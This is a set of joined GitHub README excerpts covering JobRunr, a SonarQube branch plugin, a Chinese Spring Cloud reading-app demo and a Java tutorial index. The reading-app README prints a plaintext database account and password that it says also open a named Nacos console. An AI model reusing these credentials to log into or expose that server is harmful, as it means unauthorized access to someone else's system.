tasks**](https://www.jobrunr.io/en/documentation/background-methods/scheduling-jobs/) Scheduled background jobs are executed only after a given amount of time. ```java BackgroundJob.schedule(Instant.now().plusHours(5), () -> System.out.println("Reliable!")); ``` [**Recurring tasks**](https://www.jobrunr.io/en/documentation/background-methods/recurring-jobs/) Recurring jobs have never been simpler; just call the following method to perform any kind of recurring task using the [CRON expressions](http://en.wikipedia.org/wiki/Cron#CRON_expression). ```java BackgroundJob.scheduleRecurrently("my-recurring-job", Cron.daily(), () -> service.doWork()); ``` **Process background tasks inside a web application…** You can process background tasks in any web application and we have thorough support for [Spring](https://spring.io/) - JobRunr is reliable to process your background jobs within a web application. **… or anywhere else** Like a Spring Console Application, wrapped in a docker container, that keeps running forever and polls for new background jobs. See [https://www.jobrunr.io](https://www.jobrunr.io) for more info. Installation ------------ #### Using Maven? JobRunr is available in Maven Central - all you need to do is add the following dependency: ```xml <dependency> <groupId>org.jobrunr</groupId> <artifactId>jobrunr</artifactId> <version>${jobrunr.version}</version> </dependency> ``` #### Using Gradle? Just add the dependency to JobRunr: ```groovy implementation 'org.jobrunr:jobrunr:${jobrunr.version}' ``` Configuration ------------ #### Do you like to work Spring based? Add the [*jobrunr-spring-boot-3-starter*](https://search.maven.org/artifact/org.jobrunr/jobrunr-spring-boot-3-starter) to your dependencies and you're almost ready to go! Just set up your `application.properties`: ``` # the job-scheduler is enabled by default # the background-job-server and dashboard are disabled by default org.jobrunr.job-scheduler.enabled=true org.jobrunr.background-job-server.enabled=true org.jobrunr.dashboard.enabled=true ``` #### Or do you prefer a fluent API? Define a `javax.sql.DataSource` and put the following code on startup: ```java @SpringBootApplication public class JobRunrApplication { public static void main(String[] args) { SpringApplication.run(JobRunrApplication.class, args); } @Bean public JobScheduler initJobRunr(DataSource dataSource, JobActivator jobActivator) { return JobRunr.configure() .useJobActivator(jobActivator) .useStorageProvider(SqlStorageProviderFactory .using(dataSource)) .useBackgroundJobServer() .useDashboard() .initialize().getJobScheduler(); } } ``` ## Contributing See [CONTRIBUTING](https://github.com/jobrunr/jobrunr/blob/master/CONTRIBUTING.md) for details on submitting patches and the contribution workflow. ### How can I contribute? * Take a look at issues with tag called [`Good first issue`](https://github.com/jobrunr/jobrunr/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22) * Join the discussion on [Github discussion](https://github.com/jobrunr/jobrunr/discussions) - we won't be using Gitter anymore. * Answer questions on [issues](https://github.com/jobrunr/jobrunr/issues). * Fix bugs reported on [issues](https://github.com/jobrunr/jobrunr/issues), and send us pull request. ### How to build? * `git clone https://github.com/jobrunr/jobrunr.git` * `cd jobrunr` * `cd core/src/main/resources/org/jobrunr/dashboard/frontend` * `npm i` * `npm run build` * `cd -` * `./gradlew publishToMavenLocal` Then, in your own project you can depend on `org.jobrunr:jobrunr:1.0.0-SNAPSHOT`.
A plugin that allows branch analysis and pull request decoration in the Community version of Sonarqube
sonarqube sonarqube-analysis sonarqube-plugin sonarqube-scanner sonarqube-server
[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=mc1arke_sonarqube-community-branch-plugin&metric=alert_status)](https://sonarcloud.io/dashboard?id=mc1arke_sonarqube-community-branch-plugin) [![Build Status](https://img.shields.io/github/actions/workflow/status/mc1arke/sonarqube-community-branch-plugin/.github/workflows/build.yml?branch=master&logo=github)](https://github.com/mc1arke/sonarqube-community-branch-plugin?workflow=build) # Sonarqube Community Branch Plugin A plugin for SonarQube to allow branch analysis in the Community version. # Support This plugin is not maintained or supported by SonarSource and has no official upgrade path for migrating from the SonarQube Community Edition to any of the Commercial Editions (Developer, Enterprise, or Data Center Edition). Support for any problems is only available through issues on the Github repository or through alternative channels (e.g. StackOverflow) and any attempt to request support for this plugin directly from SonarSource or an affiliated channel ( e.g. Sonar Community forum) is likely to result in your request being closed or ignored. If you plan on migrating your SonarQube data to a commercial edition after using this plugin then please be aware that this may result in some or all of your data being lost due to this compatibility of this plugin and the official SonarQube branch features being untested. # Compatibility Use the following table to find the correct plugin version for each SonarQube version SonarQube Version | Plugin Version ------------------|--------------- 10.3 | 1.18.0 10.2 | 1.17.1 10.1 | 1.16.0 10.0 | 1.15.0 9.9 (LTS) | 1.14.0 Older versions are listed on the Github release page but are no longer supported. # Features The plugin is intended to support the [features and parameters from the SonarQube documentation](https://docs.sonarqube.org/latest/branches/overview/). # Installation ## Manual Install __Please ensure you follow the installation instructions for the version of the plugin you're installing by looking at the README on the relevant release tag.__ Either build the project or [download a compatible release version of the plugin JAR](https://github.com/mc1arke/sonarqube-community-branch-plugin/releases) . 1. Copy the plugin JAR file to the `extensions/plugins/` directory of your SonarQube instance 2. Add `-javaagent:./extensions/plugins/sonarqube-community-branch-plugin-${version}.jar=web` to the `sonar.web.javaAdditionalOpts` property in your Sonarqube installation's `conf/sonar.properties` file, e.g. `sonar.web.javaAdditionalOpts=-javaagent:./extensions/plugins/sonarqube-community-branch-plugin-${version}.jar=web` where ${version} is the version of the plugin being worked with. e.g `1.8.0` 3. Add `-javaagent:./extensions/plugins/sonarqube-community-branch-plugin-${version}.jar=ce` to the `sonar.ce.javaAdditionalOpts` property in your Sonarqube installation's `conf/sonar.properties` file, e.g. `sonar.ce.javaAdditionalOpts=-javaagent:./extensions/plugins/sonarqube-community-branch-plugin-${version}.jar=ce` 4. Start Sonarqube, and accept the warning about using third-party plugins ## Docker The plugin is distributed in the [mc1arke/sonarqube-with-community-branch-plugin](https://hub.docker.com/r/mc1arke/sonarqube-with-community-branch-plugin) Docker image, with the image versions matching the up-stream Sonarqube image version. __Note:__ If you're setting the `SONAR_WEB_JAVAADDITIONALOPTS` or `SONAR_CE_JAVAADDITIONALOPTS` environment variables in your container launch then you'll need to add the `javaagent` configuration to your overrides to match what's in the provided Dockerfile. ## Docker Compose A `docker-compose.yml` file is provided. It uses the env variables available in `.env`. To use it, clone the repository and execute `docker-compose up`. Note that you need to have docker-compose installed in your system and added to your PATH ## Kubernetes with official Helm Chart When using [Sonarqube official Helm Chart](https://github.com/SonarSource/helm-chart-sonarqube/tree/master/charts/sonarqube), you need to add the following settings to your helm values, where `${version}` should be replaced with the plugin version (e.g. `1.11.0`). Beware of the changes made in helm chart version [6.1.0](https://github.com/SonarSource/helm-chart-sonarqube/blob/master/charts/sonarqube/CHANGELOG.md#610): ### helm chart version < 6.1.0 ```yaml plugins: install: - https://github.com/mc1arke/sonarqube-community-branch-plugin/releases/download/${version}/sonarqube-community-branch-plugin-${version}.jar lib: - sonarqube-community-branch-plugin-${version}.jar jvmOpts: "-javaagent:/opt/sonarqube/lib/common/sonarqube-community-branch-plugin-${version}.jar=web" jvmCeOpts: "-javaagent:/opt/sonarqube/lib/common/sonarqube-community-branch-plugin-${version}.jar=ce" ``` ### helm chart version >= 6.1.0 ```yaml plugins: install: - https://github.com/mc1arke/sonarqube-community-branch-plugin/releases/download/${version}/sonarqube-community-branch-plugin-${version}.jar jvmOpts: "-javaagent:/opt/sonarqube/extensions/plugins/sonarqube-community-branch-plugin-${version}.jar=web" jvmCeOpts: "-javaagent:/opt/sonarqube/extensions/plugins/sonarqube-community-branch-plugin-${version}.jar=ce" ``` ### Issues with file path with persistency If you set `persistence.enabled=true` on SonarQube chart, the plugin might be copied to this path, based on the helm chart version, mentioned above (`${plugin-path}` equals `lib/common` or `extensions/plugins`): ``` /opt/sonarqube/${plugin-path}/sonarqube-community-branch-plugin-${version}.jar/sonarqube-community-branch-plugin-${version}.jar ``` instead of this: ``` /opt/sonarqube/${plugin-path}/sonarqube-community-branch-plugin-${version}.jar ``` As a workaround either change the paths in the config above, or exec into the container and move file up the directory to match the config. # Configuration ## Global configuration Make sure `sonar.core.serverBaseURL` in SonarQube [/admin/settings](http://localhost:9000/admin/settings) is properly set in order to for the links in the comment to work. Set all other properties that you can define globally for all of your projects. ## How to decorate a Pull Request In order to decorate your Pull Request's source branch, you need to analyze your target branch first. ### Run analysis of branches If the scan is being run from a CI supporting auto-configuration then the scanner can be launched without any branch parameters. Otherwise, the analysis needs the following setting: `sonar.branch.name = branch_name (e.g master)` ### Run analysis of the PR branch Carefully read the official SonarQube guide for [pull request decoration](https://docs.sonarqube.org/latest/analysis/pull-request/) In there you'll find the following properties that need to be set, unless your CI support auto-configuration. ``` sonar.pullrequest.key = pull_request_id (e.g. 100) sonar.pullrequest.branch = source_branch_name (e.g feature/TICKET-123) sonar.pullrequest.base = target_branch_name (e.g master) ``` :warning: There must not be any `sonar.branch` properties like `sonar.branch.name` arguments set when you analyze a pull-request. These properties indicate to sonar that a branch is being analyzed rather than a pull-request so no pull-request decoration will be executed. ## Serving images for PR decoration By default, images for PR decoration are served as static resources on the SonarQube server as a part of Community Branch Plugin. If you use a SonarQube server behind a firewall and/or PR service (Github, Gitlab etc.) doesn't have access to SonarQube server, you should change `Images base URL` property in `General > Pull Request` settings. Anyone needing to set this value can use the URL `https://raw.githubusercontent.com/mc1arke/sonarqube-community-branch-plugin/master/src/main/resources/static`, or download the files from this location and host them themself. # Building the plugin from source If you want to try and test the current branch or build it for your development execute `./gradlew clean build` inside of the project directory. This will put the built jar under `libs/sonarqube-community-branch-plugin*.jar`
:books: 轻松阅读,基于SpringCloud生态开发的阅读类APP微服务实战项目,涉及 SpringCloud-Gateway、Nacos、OpenFeign、Hystrix、Jwt、ElasticSearch 等技术的应用
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<h1 align="center"> 轻松阅读 - API - 2.0 </h1> <p align="center"> <a href="https://github.com/spring-cloud"> <img src="https://img.shields.io/badge/spring--cloud-2.1.5-blue" alt="spring-cloud"> </a> <a href="https://github.com/Netflix/Hystrix"> <img src="https://img.shields.io/badge/hystrix-1.5.18-blue" alt="hystrix"> </a> <a href="https://github.com/jwtk/jjwt"> <img src="https://img.shields.io/badge/jwt-0.9.1-blue" alt="jwt"> </a> <a href="https://github.com/Zealon159/light-reading-cloud/blob/master/LICENSE"> <img src="https://img.shields.io/badge/License-MIT-yellow" alt="license"> </a> </p> ## 项目介绍 light reading cloud(轻松阅读)是一款图书阅读类APP,基于 SpringCloud 生态开发的微服务实践项目,涉及 SpringCloud-Gateway、Nacos、Hystrix、OpenFeign、Jwt、ElasticSearch 等技术栈的应用。 项目的侧重点主要是基于实际业务场景使用微服务架构落地的思路,会采用图文的方式介绍每个服务或接口的原理以及为什么使用这种方式实现,希望会对想入门微服务的同学有所帮助。 客户端采用 Vue.js 、Vuetify 开发:[点击进入仓库](https://github.com/Zealon159/light-reading-cloud-client) ### 版本 `2.0` 版本,主要更新了 SpringCloud Alibaba 的 Nacos 组件,替代了 SpringCloud Config 以及 Eureka `1.0` 版本,采用 SpringCloud Config、Eureka 为配置中心、注册中心。获取此版本,请查看 `reading-1.0` 分支的说明,并 `Checkout` 此分支 ### 演示 演示地址:[http://reading-cloud.zealon.cn/#/index](http://reading-cloud.zealon.cn/#/index) ,`手机访问效果佳 ^_^` 数据库地址:`` ,端口 `3306` 数据库账户:`hello_developer` ,密码:`Bestyou2020.com` Nacos地址:`http://reading-cloud.zealon.cn:8848/nacos/`,账户密码同上 由于云服务器单机部署,可能内存不足导致Nacos宕机而看不见配置文件,这里专门把配置文件放置在 `bootstrap-config` 目录下,使用静态配置文件方式启动项目(手动更换各个项目对应的配置文件)。 或者切换到 `reading-1.0` 分支,该分支使用了eureka 实现的注册中心。 部分截图: ![](http://reading.zealon.cn/index_1.jpg) ### 架构图 客户端访问接口由统一流量入口 SpringCloud-Gateway 接收请求、响应结果,网关与微服务基于异步IO Netty通信,微服务获取配置文件启动后通过 Nacos 完成服务注册与发现,微服务之间的相互调用基于http协议的 FeignClient客户端。 核心架构图如下: ![](http://reading.zealon.cn/framework.png) ### 系统模块 微服务拆分策略: - 业务先行,理清楚业务边界和依赖 - 先有独立的模块,后有分布式服务 - 模块之间的依赖关系要清晰、参数简单、耦合要少 - 最重要的是需求,根据需求判断具体价值,再按价值建立设计原则,最后按照设计原则来选择落地的技术方案,而不是根据技术来套业务需求 > 阅读APP,如果你有阅读的习惯,相信对此类产品并不陌生,其核心功能是阅读,当然在阅读之前需要发现想要读的图书,这就需要精品(榜单)页、排行、分类、搜索等功能的支撑,而用户数据主要分为账户、会员、书架、积分、评论等功能。 > > 所以根据业务场景可进行最基础的拆分服务:图书服务、精品页服务、排行榜服务、搜索服务、账户服务、会员服务、消息服务、积分服务、活动服务、评论服务、支付服务等等(实际上会有比这更多的功能哈) 本项目进行以下拆分: | No | 工程模块 | 说明 | 依赖 | | ---- | -------------------------- | ---------------------------------------- | ------- | | 1 | reading-cloud-common | 公共模块,存放通用的POJO、工具类等文件。 | - | | 2 | reading-cloud-gateway | 服务网关,流量入口、权限验证等 | - | | 3 | reading-cloud-book | 图书中心,提供图书基础数据接口 | 1 | | 4 | reading-cloud-account | 账户中心,提供账户授权、用户服务等接口 | 1、3 | | 5 | reading-cloud-homepage | 精品页中心,提供App精品页接口 | 1、3、4 | | 6 | reading-cloud-feign-client | Feign客户端,提供微服务的公用客户端 | 1 | 这样拆分的粒度比较适中,其中每个服务相对都比较独立。由于个人精力有限,只实现了最核心的业务:图书、精品页、账户、书架等服务。 从依赖中可以看出,除了common之外,图书中心被依赖的次数最多,由此可见图书中心是最基础的服务,为此需要对这类底层的服务分配更多的容器,具体的还需要根据 `DAU`、`QPS` 等综合衡量,决策更合适的数值,是否要进一步拆分微服务等等。 ## 快速开始 ### step1 - 创建数据库 导入数据库脚本,分别创建数据库 `reading_cloud_resource`、`reading_cloud_account`,然后导入建表脚本。 需要示例数据的话,可以到阿里云数据库导出数据哈,在上面有数据库连接信息。 ### step2 - 配置文件 由于我的服务器内存不够用了,就没搭建配置中心,可以直接修改每个工程的 `bootstrap.yml` 文件,更新数据库信息、redis配置信息等。 ### step3 - 启动程序 首先启动注册中心,然后依次启动图书中心、账户中心、精品页中心、服务网关,可以在配置文件中自行修改端口哈。 ## 指南 工程模块主要划分为2个类型:**基础服务** 和 **业务服务**。 其中配置中心、注册中心、服务网关为基础服务,图书中心、账户中心、精品页中心为业务服务,这里会侧重说明业务部分。 ### 公共模块 - reading-cloud-common 主要存放Pojo、Constant、工具类等公共资源,作为独立的Jar包供其他工程依赖使用。 相当于单体项目里的 common 包独立出来,实现同等的价值,这样不需要每个微服务项目冗余公共代码资源,需要注意只存放公共代码,从而得到更好的抽离和复用。 ### 配置中心/注册中心 - Alibaba-Nacos #### 配置中心 从上面的架构图中我们可以得知,几乎所有的工程都要从配置中心获取配置信息。其目的是用来统一管理配置,配置中心可以在微服务等场景下极大地减轻配置管理的工作量,增强配置管理的服务能力。 > 单体项目的时候,我们把配置信息放到 `.yml` 或 `.properties` 文件中,随着项目走的,一个项目可能有几个配置文件。当请求量随着增大,项目可能要部署多个节点了,这时候维护起来会越来越麻烦,也容易出错。发布的工作降低了整体的工作效率,为了能够提升工作效率,配置中心应运而生了,我们可以将配置统一存放在配置中心来进行管理。 目前主流的配置中心有 Apollo、SpringCloud-Config、Nacos 等开源产品,每款配置中心都能满足统一管理配置的需求,本项目的1.0版本中使用 SpringCloud-Config 作为配置中心、Eureka为注册中心,2.0使用了 Nacos,因为它除了可以做配置中心,还可以做服务注册发现,替代了 Eureka 和 SpringCloud-Config 两个产品。 #### 注册中心 注册中心,是一个独立的服务组件,核心功能是服务治理,集中存储、监控、我们的服务信息。 工作过程简单来说,首先服务提供者启动时,向注册中心提供自己的服务信息,然后消费者服务要请求某个接口时,不是直接去请求具体的服务地址,而是在注册中心拉取得到要请求的服务地址,最后再通过这个地址、端口信息远程调用服务。大体过程如下图: ![](http://reading.zealon.cn/register.jpg) 当然服务注册与服务发现的过程并不仅仅只有注册和拉取这两个动作,还有一些其他相关的动作。如注册中心存储数据的缓存更新、提供者服务故障处理、消费者心跳检测等等。 ### 服务网关 - reading-cloud-gateway API 网关是对外提供服务的一个入口,并且隐藏了内部架构的实现,是微服务架构中必不可少的一个组件。API 网关可以为我们管理大量的 API 接口,负责对接协议适配、安全认证、路由转发、流量限制、日志监控、防止爬虫、等功能。 主流的开源网关有比较早的 Zuul 以及 SpringCloud 自己研发了一个全新的网关 Spring Cloud Gateway。由于 Zuul1 基于 Servlet 构建,使用的是阻塞的 IO,性能并不是很理想。Spring Cloud Gateway 则基于 Spring 5、Spring boot 2 和 Reactor 构建,使用 Netty 作为运行时环境,比较完美的支持异步非阻塞编程。 <center>没使用网关的情况</center> ![](http://reading.zealon.cn/gateway-01.jpg) <center>使用网关后</center> ![](http://reading.zealon.cn/gateway-02.jpg) 我想,没有网关和使用网关的区别,看见客户端的表情你就明白了其中的奥义了吧(无论服务端多么复杂...)。 项目采用 SpringCloud Gateway 作为网关实现,主要实现了统一认证、动态路由。 SpringCloud Gateway 两大核心,一个是Predicate,路由匹配,一个是Filter,过滤器。 路由匹配的配置方式有 Fluent API 和 yml 两种方式,这里采用 yml 方式。具体见 reading-cloud-gateway 工程里的配置文件。 SpringCloud Gateway 有全局过滤器和局部过滤器之分,对应的接口为 GatewayFilter 和 GlobalFilter。我们统一认证的实现方式是自定义实现全局过滤器,在过滤器里面可以处理白名单放行、认证校验、动态处理请求参数等。位置:`cn.zealon.readingcloud.gateway.filter.AuthFilter` 认证校验过程参考 `账户中心 - reading-cloud-account` 的说明文档,在最下边。 其白名单配置在Nacos中,可通过动态配置进行更新。 ### 图书中心 - reading-cloud-book 图书中心作为基础数据提供图书信息服务,另外就是提供图书详情接口、章节目录、章节阅读等接口了。 #### 数据表结构 PS:只列举了关键表和关键字段 1. 图书表(book) 2. 章节表(book_chapter)一对多关系。 ![](http://reading.zealon.cn/book-center-table.png) #### 接口服务 可以看到如下的几个接口,接口描述使用 swagger 实现。 ![](http://reading.zealon.cn/book-center.jpg) 其中图书查询接口比较简单,看代码很轻易的就能明白,这里重点说明一下章节阅读接口 `book/chapter/readChapter`。 首先分析一下阅读操作的特征: - 首次阅读从第一章开始,只有下一章,没有上一章操作 - 普通章节,可操作上一章、下一章 - 末尾章节,只有上一章,没有下一章 分析得出,阅读章节的数据结构几乎就是一个双向链表,所以接口可以采用这种模式来存储一本书的阅读数据。 > Q:为什么非要使用链表存储呢?阅读当前章节的时候同时查询上一章和下一章不是也可以吗? > > A:没错啊,利用当前章节计算上一章和下一章是可行的,但是这种方式每访问一章都需要进行上下章查询与计算,而通过链表这种方式,只需要第一次生成一次链表,后面每次在链表中读取即可,相比每次计算和一次计算,当然要选择后者啦,而且随着章节越多耗费的性能差距也就越大。 按着这个思路,接下来就是要设计具体数据了。我们看一下下边的数据结构,key 代表当前章节ID,value代表上下章关系数据,都有一个 pre 和 next 指向前驱章节和后继章节,这样当请求任意章节时,通过传入的章节ID就直接获得了前后章节信息了。 ``` [ { "key":"519", "value":{ "id":529, "name":"第一章 装B的乞丐", "pre":null, "next":[ { "id":530, "name":"第二章 资格" } ] } }, { "key":"530", "value":{ "id":530, "name":"第二章 资格", "pre":[ { "id":529, "name":"第一章 装B的乞丐" } ], "next":[ { "id":531, "name":"第三章 开始修炼清心诀" } ] } }, { "key":"530", "value":{ "id":531, "name":"第三章 开始修炼清心诀", "pre":[ { "id":530, "name":"第二章 资格" } ], "next":[ { "id":532, "name":"第四章 暴打恶霸" } ] } } ] ``` 设计好了数据结构,想想Redis哪些类型能存储我们的章节数据呢,String自然是不行的了,Hash 貌似可行哎,可以通过 K / V 的形式存储,key即我们的章节ID,value即我们的链表内容,获取的时候只需要提供 key 即可,时间复杂度 O(1),不错的赶脚吧。好了,那就实现它吧~ 数据结构类是 `BookPreviousAndNextChapterNode` ,实现函数是 `BookChapterServiceImpl.getChapterNodeData`,那么有了章节基础数据了,剩下的就是完成整个接口的设计了。接口响应的结果数据除了前后章信息之外,就是当前章节内容了,而前后章的内容万万不能返回的,浪费资源啊。 大致流程图(蓝色环节只在没有缓存时执行一次): ![](http://reading.zealon.cn/process-chapter-read.jpg) 其中,没有缓存时,会查询一次数据库,计算整个链表存到缓存,后面再请求时,直接redis的hash返回,不需要再计算前后章节了。 ### 精品页中心 - reading-cloud-homepage 精品页主要提供app首页数据接口,换一换、图书列表接口。所以依赖于图书中心和账户中心。 #### 数据表设计 1. 精品页配置表(index_page_config) 这个表为精品页推荐、男生、女生的配置总表,根据page_type存储对应的banner或booklist page_type=1 即书单,page_type=2 则Banner 2. Banner轮播表(index_banner) 3. Banner轮播明细表(index_banner_item) 4. 书单配置表(index_booklist) 5. 书单配置明细表(index_booklist_item) ![](http://reading.zealon.cn/homepage-db.jpg) 表详细说明可见数据库SQL建表后的注释。 #### 接口服务 主页的接口主要是读为主,就那么3个,是不是感觉挺简单的哈。 ![](http://reading.zealon.cn/homepage.jpg) 这里主要说明下精品页接口,首先看下精品页的需求: - 按配置有序加载对应的栏目(也就是Banner或书单) - 书单可按类型加载不同的样式 - 书单可按更多配置项呈现换一换或更多或无 所以分析的大致接口逻辑图如下 ![](http://reading.zealon.cn/index-process.jpg) 有了这个结构图,开发功能就清晰多了。 其中获取图书部分内部还有一些细节,随机获取时,每次随机得到的book不能重复,本次随机结果不能与客户端内的图书重复,如果配置数量不够随机的话还不能进行随机等等。想了解细节见代码:`cn.zealon.readingcloud.homepage.service.impl.IndexPageConfigServiceImpl.java` 中 `getIndexPageByType` 函数。 关于获取图书信息,是通过Feign客户端实现的,也就是我们说的微服务之间远程调用,下面是请求链调用的过程 ![](http://reading.zealon.cn/index-seq.jpg) 其中精品页服务内部逻辑也就是我们的流程图部分,而调用链的过程使用时序图更为清晰。 :star: 看蓝色文字调用,这两处即我们的微服务之间的调用了,使用的是FeignClient,注意这里的调用返回结果,如果不是要求100%的实时性,一定要加上缓存,不用每次都去远程调用而减少服务提供者的压力。 :star: 是否注意到了,流程图更适合用于业务逻辑;而时序图适合用于调用链,通常每个节点代表了一个端点(即独立的服务或组件)​ #### ---------------------- 2020-06-01 增加搜索接口 ---------------------- 搜索服务基于ElasticSearch搜索引擎实现,采用版本6.3.1,搜索客户端使用Jest,实际上搜索功能需要独立出来一个微服务工程,必定用户找书是一个很独立的、常用的功能,搜索的背后还要处理很多用户埋点数据,因此接口请求量会比较多。 这里放到了精品页工程中,主要是服务器没有更多内存空间来启动独立的Java进程了 ,ε=(´ο`*)))唉。。。 搜索功能的实现,主要根据搜索需求,然后利用合适的ESAPI来实现,这里就不多说了。搜索数据的同步,目前我是手动执行存储到ES索引库里的,一般情况下,有两种同步手段: 1. 定时任务同步更新 2. 基于MQ准实时更新 **第一种定时任务同步** 这种方式相对来说更传统一些,可以写一个增量同步的脚本,然后使用CRON表达式指定执行间隔,来处理数据同步到ES索引库。缺点一是数据更新不及时,而是定时任务执行中,若无数据则会每次运行会浪费CPU资源。 所以如果要实时性比较高的话,最好采用第二种方式利用MQ处理。 **第二种基于MQ更新** MQ(MessageQueue)即消息队列,多用于解耦、削峰、异步处理等场景。主流的开源项目有ActiveMQ、RabbitMQ、RocketMQ、Kafka等等,这里例举采用RabbitMQ来实现。 首先看一下基于MQ的同步过程: ![](http://reading.zealon.cn/MQ.jpg) 基于MQ的点对点通信,完成整个同步过程,即运营同学对图书进行了写操作,这时候将数据发送至指定的队列(RabbitMQ实际上是绑定交换器,交换器在绑定队列),然后消费者服务监听这个队列,若有数据及时消费处理了(也就是将数据同步到ES索引库中哈),这样就实现了准时更新了。 ### 账户中心 - reading-cloud-account 账户中心提供用户注册、登录验证、用户书架、喜欢看等服务。其中授权验证使用了jwt。 #### 数据表结构 1. 用户表(user) 2. 用户书架表(user_bookshelf) 3. 用户喜欢看表(user_like_see) ![](http://reading.zealon.cn/account-center-table.jpg) #### 接口服务 其中用户服务接口复制登录认证与注册,用户书架、喜欢看都是用户行为的接口 ![](http://reading.zealon.cn/account-center.jpg) **安全认证** 常用的认证方式主要有三种:Session、HTTP Basic Authentication 和 Token。 - session 是认证中最常用的一种方式,也是最简单的。用户登录后将信息存储在后端,客户端则通过 Cookie 中的 SessionId 来标识对应的用户。 - HTTP Basic Authentication 也就是 HTTP 基本认证,它是 HTTP 1.0 提出的一种认证机制。HTTP 基本认证的原理是客户端在请求时会在请求头中增加 Authorization,Authorization 是用户名和密码用 Base64 加密后的内容。服务端获取 Authorization Header 中的用户名与密码进行验证。 - Token 中会存储用户的信息,然后通过加密算法进行加密,只有服务端才能解密,服务端拿到 Token 后进行解密获取用户信息。 相比之下,Token更适用于微服务的安全认证。所以采用了基于Token实现的 JWT作为本项目的安全认证规范。 JWT(JSON Web Token)是一个非常轻巧的规范。这个规范允许我们使用JWT在用户和服务器之间传递安全可靠的信息。在HTTP通信过程中,进行身份认证。 比如在用户登录时,基本思路就是用户提供用户名和密码给认证服务器,服务器验证用户提交信息的合法性;如果验证成功,会产生并返回一个 Token,客户端将Token保存起来。 ![](http://reading.zealon.cn/jwt-1.jpg) 再次请求服务端时,一般会将 Token 放入请求头中进行传递。当请求到达网关后,会在网关中对 Token 进行校验,如果校验成功,则将该请求转发到后端的服务中,在转发时会将 Token 解析出的用户信息也一并带过去,这样在后端的服务中就不用再解析一遍 Token 获取的用户信息,这个操作统一在网关进行的。如果校验失败,那么就直接返回对应的结果给客户端,不会将请求进行转发。 ![](http://reading.zealon.cn/jwt-2.jpg) :star: ​我们知道,网关是唯一入口,所有一般情况下,微服务之间的请求,就不需要再进行认证了。 :star: 有一些服务是不需要认证的,这时候,我们可以在网关中加白名单进行处理。 :star: 我们知道,jwt认证的过程主要是加密​,然后结果和Token匹配,而加密运算会耗费CPU资源,如果请求量比较大,可以将Token存储缓存,缓存失败再进行实时认证,可以大幅度的提升网关服务器的CPU性能。 ## 附录 附录1.在线UML编辑工具:https://app.diagrams.net/ 附录2.在线数据表关系编辑工具:https://dbdiagram.io/ ## License [MIT](https://github.com/Zealon159/book-ms-interface/blob/master/LICENSE) Copyright (c) 2020 光彩盛年
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[Java简史、特性、前景](docs/overview/what-is-java.md) - [Windows和macOS下安装JDK教程](docs/overview/jdk-install-config.md) - [在macOS和Windows上安装Intellij IDEA](docs/overview/IDEA-install-config.md) - [编写第一个程序Hello World](docs/overview/hello-world.md) ## Java基础语法 - [48个关键字及2个保留字全解析](docs/basic-extra-meal/48-keywords.md) - [了解Java注释](docs/basic-grammar/javadoc.md) - [基本数据类型与引用数据类型](docs/basic-grammar/basic-data-type.md) - [自动类型转换与强制类型转换](docs/basic-grammar/type-cast.md) - [Java基本数据类型缓存池剖析(IntegerCache)](docs/basic-extra-meal/int-cache.md) - [Java运算符详解](docs/basic-grammar/operator.md) - [Java流程控制语句详解](docs/basic-grammar/flow-control.md) - [Java 语法基础练习题](docs/basic-grammar/basic-exercise.md) ## 数组&字符串 - [掌握Java数组](docs/array/array.md) - [掌握 Java二维数组](docs/array/double-array.md) - [如何优雅地打印Java数组?](docs/array/print.md) - [深入解读String类源码](docs/string/string-source.md) - [为什么Java字符串是不可变的?](docs/string/immutable.md) - [深入理解Java字符串常量池](docs/string/constant-pool.md) - [详解 String.intern() 方法](docs/string/intern.md) - [String、StringBuilder、StringBuffer](docs/string/builder-buffer.md) - [Java中equals()与==的区别](docs/string/equals.md) - [最优雅的Java字符串拼接是哪种方式?](docs/string/join.md) - [如何在Java中拆分字符串?](docs/string/split.md) ## Java面向对象编程 - [类和对象](docs/oo/object-class.md) - [Java中的包](docs/oo/package.md) - [Java变量](docs/oo/var.md) - [Java方法](docs/oo/method.md) - [Java可变参数详解](docs/basic-extra-meal/varables.md) - [手把手教你用 C语言实现 Java native 本地方法](docs/oo/native-method.md) - [Java构造方法](docs/oo/construct.md) - [Java访问权限修饰符](docs/oo/access-control.md) - [Java代码初始化块](docs/oo/code-init.md) - [Java抽象类](docs/oo/abstract.md) - [Java接口](docs/oo/interface.md) - [Java内部类](docs/oo/inner-class.md) - [深入理解Java三大特性:封装、继承和多态](docs/oo/encapsulation-inheritance-polymorphism.md) - [详解Java this与super关键字](docs/oo/this-super.md) - [详解Java static 关键字](docs/oo/static.md) - [详解Java final 关键字](docs/oo/final.md) - [掌握Java instanceof关键字](docs/basic-extra-meal/instanceof.md) - [聊聊Java中的不可变对象](docs/basic-extra-meal/immutable.md) - [方法重写 Override 和方法重载 Overload 有什么区别?](docs/basic-extra-meal/override-overload.md) - [深入理解Java中的注解](docs/basic-extra-meal/annotation.md) - [Java枚举:小小enum,优雅而干净](docs/basic-extra-meal/enum.md) ## 集合框架(容器) - [Java集合框架概览,包括List、Set、Map、队列](docs/collection/gailan.md) - [深入探讨 Java ArrayList](docs/collection/arraylist.md) - [深入探讨 Java LinkedList](docs/collection/linkedlist.md) - [Java Stack详解](docs/collection/stack.md) - [Java HashMap详解](docs/collection/hashmap.md) - [Java LinkedHashMap详解](docs/collection/linkedhashmap.md) - [Java TreeMap详解](docs/collection/treemap.md) - [Java 双端队列 ArrayDeque详解](docs/collection/arraydeque.md) - [Java 优先级队列PriorityQueue详解](docs/collection/PriorityQueue.md) - [Java Comparable和Comparator的区别](docs/collection/comparable-omparator.md) - [时间复杂度,评估ArrayList和LinkedList的执行效率](docs/collection/time-complexity.md) - [ArrayList和LinkedList的区别](docs/collection/list-war-2.md) - [Java 泛型深入解析](docs/basic-extra-meal/generic.md) - [Java迭代器Iterator和Iterable有什么区别?](docs/collection/iterator-iterable.md) - [为什么禁止在foreach里执行元素的删除操作?](docs/collection/fail-fast.md) ## Java IO - [深入了解 Java IO](docs/io/shangtou.md) - [Java File:IO 流的起点与终点](docs/io/file-path.md) - [Java 字节流:Java IO 的基石](docs/io/stream.md) - [Java 字符流:Reader和Writer的故事](docs/io/reader-writer.md) - [Java 缓冲流:Java IO 的读写效率有了质的飞升](docs/io/buffer.md) - [Java 转换流:Java 字节流和字符流的桥梁](docs/io/char-byte.md) - [Java 打印流:PrintStream & PrintWriter](docs/io/print.md) - [Java 序列流:Java 对象的序列化和反序列化](docs/io/serialize.md) - [Java Serializable 